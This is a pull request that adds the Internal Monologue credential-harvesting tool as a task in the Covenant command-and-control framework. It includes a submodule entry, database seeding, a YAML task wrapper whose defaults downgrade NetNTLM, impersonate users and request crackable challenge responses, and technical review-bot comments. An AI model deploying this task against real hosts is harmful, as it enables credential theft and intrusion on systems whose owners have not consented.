Add Internal Monologue task #250

Open
wants to merge 6 commits into
base: master
3 changes: 3 additions & 0 deletions .gitmodules
Expand Up @@ -30,3 +30,6 @@
path = Covenant/Data/ReferenceSourceLibraries/SharpSC
url = https://github.com/djhohnstein/SharpSC
ignore = dirty
[submodule "Covenant/Data/ReferenceSourceLibraries/InternalMonologue"]
path = Covenant/Data/ReferenceSourceLibraries/InternalMonologue
url = https://github.com/eladshamir/Internal-Monologue
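Review bot: The new `[submodule "Covenant/Data/ReferenceSourceLibraries/InternalMonologue"]` entry has no `ignore = dirty` line, although the SharpSC entry directly above it does. If the other submodules are declared the same way, add `ignore = dirty` here too so that local build output inside the submodule tree is not reported as a change. Because this third-party source is compiled into tasks, the commit the gitlink pins (shown as 469461 on this page) is what needs reviewing before merge, since .gitmodules records only the URL.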
30 changes: 26 additions & 4 deletions Covenant/Core/DbInitializer.cs
Expand Up @@ -259,7 +259,13 @@ public async static Task InitializeTasks(ICovenantService service, CovenantConte
Name = "SharpSC", Description = "SharpSC is a .NET assembly to perform basic operations with services.",
Location= "SharpSC" + Path.DirectorySeparatorChar,
CompatibleDotNetVersions = new List<Common.DotNetVersion> { Common.DotNetVersion.Net35, Common.DotNetVersion.Net40 }
}
},
new ReferenceSourceLibrary
{
Name = "InternalMonologue", Description = "Internal Monologue is a tool to retrieve NTLM hashes without touching LSASS.",
Location= "InternalMonologue" + Path.DirectorySeparatorChar,
CompatibleDotNetVersions = new List<Common.DotNetVersion> { Common.DotNetVersion.Net35, Common.DotNetVersion.Net40 }
}
};
await service.CreateReferenceSourceLibraries(ReferenceSourceLibraries);

Expand All @@ -272,6 +278,7 @@ public async static Task InitializeTasks(ICovenantService service, CovenantConte
var su = await service.GetReferenceSourceLibraryByName("SharpUp");
var sw = await service.GetReferenceSourceLibraryByName("SharpWMI");
var sc = await service.GetReferenceSourceLibraryByName("SharpSC");
var im = await service.GetReferenceSourceLibraryByName("InternalMonologue");
await service.CreateEntities(
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = ss, ReferenceAssembly = await service.GetReferenceAssemblyByName("mscorlib.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = ss, ReferenceAssembly = await service.GetReferenceAssemblyByName("mscorlib.dll", Common.DotNetVersion.Net40) },
Expand Down Expand Up @@ -391,8 +398,23 @@ await service.CreateEntities(
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = sc, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Core.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = sc, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Core.dll", Common.DotNetVersion.Net40) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = sc, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.ServiceProcess.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = sc, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.ServiceProcess.dll", Common.DotNetVersion.Net40) }
);
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = sc, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.ServiceProcess.dll", Common.DotNetVersion.Net40) },

new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("mscorlib.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("mscorlib.dll", Common.DotNetVersion.Net40) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.dll", Common.DotNetVersion.Net40) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Core.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Core.dll", Common.DotNetVersion.Net40) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.XML.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.XML.dll", Common.DotNetVersion.Net40) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Security.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Security.dll", Common.DotNetVersion.Net40) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Data.DataSetExtensions.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Data.DataSetExtensions.dll", Common.DotNetVersion.Net40) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Data.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Data.dll", Common.DotNetVersion.Net40) }
);
}
#endregion

Expand Down Expand Up @@ -506,4 +528,4 @@ public async static Task InitializeThemes(CovenantContext context)
}
}
}
}
}
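Review bot: The seeded `Description` for the new library, "Internal Monologue is a tool to retrieve NTLM hashes without touching LSASS.", leaves out what the task description in InternalMonologue.yaml states: that the tool downgrades NetNTLM and returns challenge responses from MSV1_0 rather than hashes. An operator who reads only this string gets no hint that the task presumably changes NTLM settings on the host, so I would align it, e.g. `Description = "Internal Monologue downgrades NetNTLM and collects NetNTLM challenge responses via MSV1_0, without touching LSASS."`; the same string is repeated under `ReferenceSourceLibraries` in the YAML file. Separately, the fourteen `im` reference-assembly rows include System.Data.dll, System.Data.DataSetExtensions.dll and System.XML.dll, which look like project-template defaults, and if the library does not use them they can be dropped. InitializeTasks begins and ends outside these hunks.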
1 change: 1 addition & 0 deletions Covenant/Data/ReferenceSourceLibraries/InternalMonologue
Submodule InternalMonologue added at 469461
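--- a/Covenant/Data/Tasks/InternalMonologue.yaml
+++ b/Covenant/Data/Tasks/InternalMonologue.yaml
@@ -0,0 +1,121 @@
+- Name: InternalMonologue
+Aliases: []
+Author:
+Name: 'Simone Salucci, Daniel López & Sergio Lázaro'
+Handle: '@saim1z, @attl4s, @Slazar0'
+Link: ''
+Description: Internal Monologue downgrades NetNTLM and invokes a local procedure call to the NTLM authentication package (MSV1_0) with a specific challenge. The responses obtained can be cracked using rainbow tables.
+Help:
+Language: CSharp
+CompatibleDotNetVersions:
+- Net35
+- Net40
+Code: |
+using System;
+using System.IO;
+using InternalMonologue;
+using InternalMonologue.StringExtensions;
+
+public static class Task
+{
+public static Stream OutputStream { get; set; }
+public static string Execute(string Parameters)
+{
+string output = "";
+try
+{
+TextWriter realStdOut = Console.Out;
+TextWriter realStdErr = Console.Error;
+TextWriter stdOutWriter = new StreamWriter(OutputStream);
+TextWriter stdErrWriter = new StreamWriter(OutputStream);
+Console.SetOut(stdOutWriter);
+Console.SetError(stdErrWriter);
+
+String[] args = Parameters.Split(' ');
+
+try
+{
+Program.Main(args);
+}
+catch (Exception e)
+{
+Console.WriteLine("\r\n[!] Unhandled InternalMonlogue exception:\r\n");
+Console.WriteLine(e);
+}
+
+Console.Out.Flush();
+Console.Error.Flush();
+Console.SetOut(realStdOut);
+Console.SetError(realStdErr);
+OutputStream.Close();
+}
+catch (Exception e) { output += e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace; }
+return output;
+}
+}
+TaskingType: Assembly
+UnsafeCompile: false
+TokenTask: false
+Options:
+- Name: Parameters
+Value: ''
+DefaultValue: -Downgrade True -Restore True -Impersonate True -Thread False -Verbose False -Challenge 1122334455667788
+Description: The command-line parameters to pass to the tool.
+SuggestedValues: []
+Optional: true
+DisplayInCommand: true
+FileOption: false
+ReferenceSourceLibraries:
+- Name: InternalMonologue
+Description: Internal Monologue is a tool to retrieve NTLM hashes without touching LSASS.
+Location: InternalMonologue\
+Language: CSharp
+CompatibleDotNetVersions:
+- Net35
+- Net40
+ReferenceAssemblies:
+- Name: System.Core.dll
+Location: net40\System.Core.dll
+DotNetVersion: Net40
+- Name: System.Data.DataSetExtensions.dll
+Location: net40\System.Data.DataSetExtensions.dll
+DotNetVersion: Net40
+- Name: System.Data.dll
+Location: net40\System.Data.dll
+DotNetVersion: Net40
+- Name: System.dll
+Location: net40\System.dll
+DotNetVersion: Net40
+- Name: System.Security.dll
+Location: net40\System.Security.dll
+DotNetVersion: Net40
+- Name: mscorlib.dll
+Location: net40\mscorlib.dll
+DotNetVersion: Net40
+- Name: System.XML.dll
+Location: net35\System.XML.dll
+DotNetVersion: Net35
+- Name: System.dll
+Location: net35\System.dll
+DotNetVersion: Net35
+- Name: System.Data.dll
+Location: net35\System.Data.dll
+DotNetVersion: Net35
+- Name: System.Data.DataSetExtensions.dll
+Location: net35\System.Data.DataSetExtensions.dll
+DotNetVersion: Net35
+- Name: System.Core.dll
+Location: net35\System.Core.dll
+DotNetVersion: Net35
+- Name: mscorlib.dll
+Location: net35\mscorlib.dll
+DotNetVersion: Net35
+- Name: System.Security.dll
+Location: net35\System.Security.dll
+DotNetVersion: Net35
+- Name: System.XML.dll
+Location: net40\System.XML.dll
+DotNetVersion: Net40
+EmbeddedResources: []
+ReferenceAssemblies: []
+EmbeddedResources: []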
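Review bot: In the embedded `Task.Execute`, the console restore (`Console.SetOut(realStdOut); Console.SetError(realStdErr); OutputStream.Close();`) runs only on the success path of the outer `try`. Any exception raised before it, for example from `Parameters.Split(' ')` when `Parameters` is null, leaves Console.Out and Console.Error pointing at the task's writers and the stream open. Declare `realStdOut` and `realStdErr` before the `try` and move those three statements into a `finally`, guarding the close with a null check on `OutputStream`. If the option is left at its empty `Value: ''`, `Parameters.Split(' ')` also hands `Program.Main` a single empty argument and keeps empty entries for repeated spaces; `Parameters.Split(new[] { ' ' }, StringSplitOptions.RemoveEmptyEntries)` avoids both. The message in the inner catch misspells the tool name as "InternalMonlogue".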